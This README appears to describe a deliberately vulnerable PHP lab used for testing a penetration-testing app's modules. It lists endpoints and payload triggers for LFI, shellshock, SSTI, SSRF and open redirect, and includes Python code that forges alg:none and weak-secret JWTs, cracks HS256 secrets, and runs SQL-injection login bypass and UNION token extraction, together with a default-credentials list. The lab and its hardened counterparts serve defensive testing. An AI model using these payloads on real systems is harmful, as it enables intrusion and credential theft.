PocketPentester/vuln-lab
2026-04-19 21:10:40 +07:00

insecure.newploit.com — PocketPentester Vuln Lab

Deliberately vulnerable PHP target for shaking down every arsenal module in PocketPentester. Runs as a local docker-compose stack.

Warning

Do NOT expose this to the public internet. It has intentional RCE, SQLi, LFI, SSRF, open redirect, CORS misconfig, weak JWT, leaked secrets and more. Keep it on a private bridge network only.


Quick start

cd vuln-lab
docker compose up --build -d

Add the hostname to your hosts file so the insecure.newploit.com SNI / Host header works:

Linux / macOS: /etc/hosts

127.0.0.1   insecure.newploit.com

Windows: C:\Windows\System32\drivers\etc\hosts

127.0.0.1   insecure.newploit.com

Android (testing from PocketPentester on device) — set your phone's Wi-Fi DNS to the dev machine, or just use the host's LAN IP directly:

http://192.168.x.x/              (or whatever your dev box IP is)

Smoke-test from the host:

curl http://insecure.newploit.com/
curl http://insecure.newploit.com/.env
curl "http://insecure.newploit.com/search.php?q=<svg/onload=alert(1)>"

Open ports

| Port | Service | Notes |
|------|---------|-------|
| 80 | Apache 2.4 + PHP | main web app |
| 443 | Apache TLS | snakeoil cert for ssl_scan |
| 3306 | MariaDB 10.11 | root:toor, also dbuser:dbpass123 |
| 21 | vsftpd | anonymous:anonymous |

Module → endpoint map

Everything below is already wired. Point the tool at insecure.newploit.com (or http://<host>) and it should fire.

RECON

| Arsenal module | Where it hits |
|----------------|---------------|
| port_scan | 21 / 80 / 443 / 3306 open |
| httpx | Title "Newploit :: insecure test lab", Server "Apache/2.4.57" … |
| banner | Apache + MySQL banners expose the full version |
| ssl_scan | Self-signed CN=insecure.newploit.com on :443 |
| dns_tools | (local hosts entry) |

EXPLOIT

| Arsenal module | Endpoint(s) that fire |
|----------------|-----------------------|
| sqli | /search.php?q=…, /profile.php?id=…, /login.php POST |
| xss | /search.php?q=<payload> (reflected, unescaped) |
| jwt | /api/auth.php: alg:none accepted, HS256 secret is the literal string secret |
| xploiter | see the template-by-template table below |
| autopwn | runs the whole chain on http://insecure.newploit.com/ |
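The two token shapes the jwt row says /api/auth.php accepts, forged end to end, plus the verifier a non-lab endpoint should use instead. This is an added example, not PocketPentester's jwt module or the lab's PHP: it assumes only what the table states (alg:none is honoured, HS256 with the secret "secret" verifies); the claim values, the candidate list handed to crack_hs256 and the helper names are illustrative.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional

LAB_SECRET = b"secret"  # the HS256 secret the module table says /api/auth.php uses


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _seg(obj: dict) -> str:
    return _b64url(json.dumps(obj, separators=(",", ":")).encode())


def forge_none(claims: dict) -> str:
    """alg:none token: valid-looking header and payload, empty signature segment."""
    return f"{_seg({'alg': 'none', 'typ': 'JWT'})}.{_seg(claims)}."


def forge_hs256(claims: dict, secret: bytes = LAB_SECRET) -> str:
    """HS256-signed token; with the default secret this is what the lab accepts."""
    signing_input = f"{_seg({'alg': 'HS256', 'typ': 'JWT'})}.{_seg(claims)}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url(sig)}"


def crack_hs256(token: str, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack on the signature: returns the candidate that verifies."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    target = _b64url_decode(sig_b64)
    for cand in candidates:
        guess = hmac.new(cand, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(guess, target):
            return cand
    return None


def verify_lab_style(token: str, secret: bytes = LAB_SECRET) -> Optional[dict]:
    """The insecure pattern the table describes: trust whatever alg the token names."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") == "none":
        return json.loads(_b64url_decode(payload_b64))  # no signature check at all
    if header.get("alg") == "HS256":
        expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, _b64url_decode(sig_b64)):
            return json.loads(_b64url_decode(payload_b64))
    return None


def verify_hardened(token: str, secret: bytes) -> Optional[dict]:
    """Algorithm pinned server-side, secret length floor, constant-time compare, malformed input rejected."""
    if len(secret) < 32:
        raise ValueError("HS256 secret must be at least 256 bits")
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        sig = _b64url_decode(sig_b64)
    except ValueError:  # bad segment count, bad base64, bad UTF-8 or bad JSON
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    return json.loads(_b64url_decode(payload_b64))
```

verify_lab_style reproduces the two acceptance paths the table lists; verify_hardened shows the three changes that close them: the server chooses the algorithm, never the token; a six-byte secret is refused outright rather than left for crack_hs256 to find; and the signature comparison is constant-time.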

MANUAL

| Arsenal module | Where it hits |
|----------------|---------------|
| repeater | any of the URLs above; try ?q= with crafted payloads |
| dirfuzz | common wordlist hits /admin, /wp-admin, /backup.sql, … |
| admin_finder | /admin/, /administrator/, /wp-admin/, /wp-login.php |
| form_brute | POST /login.php with admin:admin123, root:toor, … |

UTILITY

| Arsenal module | Where it hits |
|----------------|---------------|
| domain_grabber | not relevant to a single host |
| subdomain | not relevant to a single host (add wildcard DNS if desired) |
| takeover | not relevant |
| lan_map | scan your local net and this container's IP will show up |


Xploiter bundled templates

| Template YAML | Vuln endpoint | Trigger |
|---------------|---------------|---------|
| xpl-env-leak | /.env, .env.local, .env.production | APP_KEY=, DB_PASSWORD= |
| xpl-git-config | /.git/config | [core] + remote URL |
| xpl-phpinfo | /phpinfo.php | <title>phpinfo() |
| xpl-lfi-basic | /page.php?page=… | ../../../../etc/passwd |
| xpl-rce-shellshock | /cgi-bin/test.cgi, etc. | () { :; }; echo marker |
| xpl-ssti-jinja2 | /?name=xplZZZ{{999*777}}ssti | math eval inside {{ }} |
| xpl-ssti-twig | POST / body=name=…{{'x'\|upper}}… | filter pipe eval |
| xpl-open-redirect | /redirect.php?url=, /go.php?to=, … | Location: evil.example |
| xpl-ssrf-basic | /fetch.php?url=…169.254.169.254/… | canned AWS metadata reply |
| xpl-wp-debug | /wp-content/debug.log | PHP error lines |
| xpl-cors-misconfig | / and /api/* | Origin reflection + creds |
| xpl-backup-files | /backup.sql, /backup.zip, /db.sql, … | >512B, non-HTML ctype |
| xpl-rce-log4shell | (not applicable — no JVM) | won't fire |
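What the Trigger column actually decides, written out as one match function per template and run over constructed responses shaped like the lab's. This is an added example, not PocketPentester's template engine or its YAML. Beyond what the table states it assumes three details: the Twig payload is wrapped the same way as the Jinja2 one (xplZZZ{{'x'|upper}}ssti), the canned metadata reply contains an ami-id line, and debug.log uses the "[date] PHP Warning:" line format. The shellshock echo marker and the probe Origin are made-up values.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

SHELLSHOCK_MARKER = "xplShellshockMarker"  # assumed marker echoed by the () { :; }; payload
PROBE_ORIGIN = "https://evil.example"       # assumed Origin header sent by the CORS probe


@dataclass
class Response:
    status: int
    headers: dict  # header names lowercased
    body: str

    def hdr(self, name: str) -> str:
        return self.headers.get(name.lower(), "")


def env_leak(r):
    return r.status == 200 and ("APP_KEY=" in r.body or "DB_PASSWORD=" in r.body)

def git_config(r):
    return r.status == 200 and "[core]" in r.body and re.search(r"^\s*url\s*=", r.body, re.M) is not None

def phpinfo(r):
    return "<title>phpinfo()" in r.body

def lfi_basic(r):
    return re.search(r"^root:[^:]*:0:0:", r.body, re.M) is not None  # /etc/passwd came back

def shellshock(r):
    return SHELLSHOCK_MARKER in r.body

def ssti_jinja2(r):
    return "xplZZZ776223ssti" in r.body  # 999*777 was evaluated inside {{ }}

def ssti_twig(r):
    return "xplZZZXssti" in r.body  # 'x'|upper was evaluated (payload wrapping assumed)

def open_redirect(r):
    return r.status in (301, 302, 303, 307, 308) and urlparse(r.hdr("Location")).hostname == "evil.example"

def ssrf_basic(r):
    return r.status == 200 and "ami-id" in r.body  # assumed line in the canned metadata reply

def wp_debug(r):
    return re.search(r"^\[[^\]]+\] PHP (Warning|Notice|Deprecated|Fatal error):", r.body, re.M) is not None

def cors_misconfig(r):
    return (r.hdr("Access-Control-Allow-Origin") == PROBE_ORIGIN
            and r.hdr("Access-Control-Allow-Credentials").lower() == "true")

def backup_files(r):
    ctype = r.hdr("Content-Type").lower()
    return r.status == 200 and len(r.body.encode()) > 512 and not ctype.startswith("text/html")


TRIGGERS = {
    "xpl-env-leak": env_leak, "xpl-git-config": git_config, "xpl-phpinfo": phpinfo,
    "xpl-lfi-basic": lfi_basic, "xpl-rce-shellshock": shellshock,
    "xpl-ssti-jinja2": ssti_jinja2, "xpl-ssti-twig": ssti_twig,
    "xpl-open-redirect": open_redirect, "xpl-ssrf-basic": ssrf_basic,
    "xpl-wp-debug": wp_debug, "xpl-cors-misconfig": cors_misconfig,
    "xpl-backup-files": backup_files,
}


def run_all(responses: dict) -> dict:
    """template name -> did its trigger fire, for every template we have a response for."""
    return {name: bool(check(responses[name])) for name, check in TRIGGERS.items() if name in responses}


# Constructed responses, one per template, shaped like what the lab endpoints return.
SAMPLE = {
    "xpl-env-leak": Response(200, {"content-type": "text/plain"}, "APP_KEY=base64:REDACTED\nDB_PASSWORD=dbpass123\n"),
    "xpl-git-config": Response(200, {}, "[core]\n\tbare = false\n[remote \"origin\"]\n\turl = git@example.invalid:lab.git\n"),
    "xpl-phpinfo": Response(200, {}, "<html><head><title>phpinfo()</title></head>"),
    "xpl-lfi-basic": Response(200, {}, "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"),
    "xpl-rce-shellshock": Response(200, {}, SHELLSHOCK_MARKER + "\n"),
    "xpl-ssti-jinja2": Response(200, {}, "<h1>Hello xplZZZ776223ssti</h1>"),
    "xpl-ssti-twig": Response(200, {}, "<h1>Hello xplZZZXssti</h1>"),
    "xpl-open-redirect": Response(302, {"location": "https://evil.example/"}, ""),
    "xpl-ssrf-basic": Response(200, {}, "ami-id\nami-launch-index\nhostname\niam/\n"),
    "xpl-wp-debug": Response(200, {}, "[19-Apr-2026 14:10:40 UTC] PHP Warning:  Undefined variable $x in /var/www/html/index.php on line 12\n"),
    "xpl-cors-misconfig": Response(200, {"access-control-allow-origin": PROBE_ORIGIN, "access-control-allow-credentials": "true"}, "{}"),
    "xpl-backup-files": Response(200, {"content-type": "application/octet-stream"}, "-- MySQL dump\n" + "INSERT INTO users VALUES (1,'admin','admin123');\n" * 20),
}
# A big custom 404 page served as 200: the size and content-type gate keeps it from counting as a backup.
HTML_404 = Response(200, {"content-type": "text/html; charset=utf-8"}, "<html><body>Not found</body></html>\n" * 40)
```

The negative cases are the useful part when writing a template: a 200 with a large HTML body must not trip xpl-backup-files, a redirect to a relative path must not trip xpl-open-redirect, and Access-Control-Allow-Origin: * must not count as reflection, since browsers refuse credentials with a wildcard.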

Creds cheatsheet (for form_brute / sqli bypass testing)

admin     / admin123
root      / toor
user      / password
test      / test
imtaqin   / newploit2024
guest     / guest

Also in the DB: the api_tokens.token column holds sk_* values matching the ones in /.env, so the leak-correlation story is consistent.
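The two SQLi shapes the sqli row and the creds cheatsheet are for, reproduced against an in-memory SQLite stand-in for db/init.sql so the bypass and the api_tokens extraction can be run without the stack up. This is an added example, not the lab's PHP or its real schema: only api_tokens.token comes from the text; the users and products tables, their columns, and the sk_* token values are constructed. Plaintext passwords are kept to mirror the lab, not as a recommendation.

```python
import sqlite3
from typing import List, Optional

# Seed data: the cheatsheet creds above plus constructed sk_* tokens (not the lab's real values).
USERS = [("admin", "admin123"), ("root", "toor"), ("user", "password"),
         ("test", "test"), ("imtaqin", "newploit2024"), ("guest", "guest")]
TOKENS = ["sk_live_CONSTRUCTED0001", "sk_test_CONSTRUCTED0002"]


def build_db() -> sqlite3.Connection:
    """Tiny stand-in for db/init.sql; everything except api_tokens.token is an assumed name."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE api_tokens (id INTEGER PRIMARY KEY, token TEXT);
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
    """)
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)", USERS)
    db.executemany("INSERT INTO api_tokens (token) VALUES (?)", [(t,) for t in TOKENS])
    db.executemany("INSERT INTO products (name) VALUES (?)", [("widget",), ("gadget",)])
    return db


def login_vulnerable(db, username: str, password: str) -> Optional[str]:
    """String-built query, the login.php shape. Returns the username that matched."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username: str, password: str) -> Optional[str]:
    """Same query with bound parameters: quotes in the input are data, not syntax."""
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None


def search_vulnerable(db, q: str) -> List[str]:
    """search.php shape: q is spliced into a LIKE clause, so a UNION reaches other tables."""
    return [r[0] for r in db.execute(f"SELECT name FROM products WHERE name LIKE '%{q}%'")]


def search_safe(db, q: str) -> List[str]:
    return [r[0] for r in db.execute("SELECT name FROM products WHERE name LIKE ?", (f"%{q}%",))]


# Payloads. The space after -- is required by MariaDB (the lab's DB); SQLite accepts it either way.
BYPASS_USER = "admin' -- "
TAUTOLOGY = "' OR 1=1 -- "
UNION_TOKENS = "' UNION SELECT token FROM api_tokens -- "
```

BYPASS_USER comments out the password check for a known username; TAUTOLOGY in the password field returns the first row, which with this seed order is admin, so an attacker need not know any username at all; UNION_TOKENS pulls api_tokens.token through search.php, which is the DB half of the .env correlation above. The bound-parameter versions return nothing for all three.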


Layout

vuln-lab/
├── docker-compose.yml
├── db/init.sql
└── web/
    ├── Dockerfile
    ├── apache.conf
    ├── cgi-bin/         # shellshock targets
    └── www/
        ├── index.php    # landing + SSTI + CORS
        ├── search.php   # XSS + SQLi
        ├── profile.php  # integer SQLi
        ├── login.php    # SQLi login + form_brute target
        ├── page.php     # LFI
        ├── fetch.php    # SSRF (reflects AWS metadata)
        ├── redirect.php # open redirect
        ├── api/         # JWT + CORS endpoints
        ├── admin/       # admin panel
        ├── wp-login.php # wordpress decoy
        ├── wp-content/debug.log
        ├── .env, .env.local, .env.production
        ├── .git/config, .git/HEAD
        ├── .bash_history, .DS_Store
        ├── backup.sql, backup.zip, backup.tar.gz
        ├── db.sql, dump.sql, site.zip, www.zip, public_html.zip
        └── robots.txt

Teardown

docker compose down -v

Built for PocketPentester by imtaqin / tegalsec. Have fun. Don't ship this.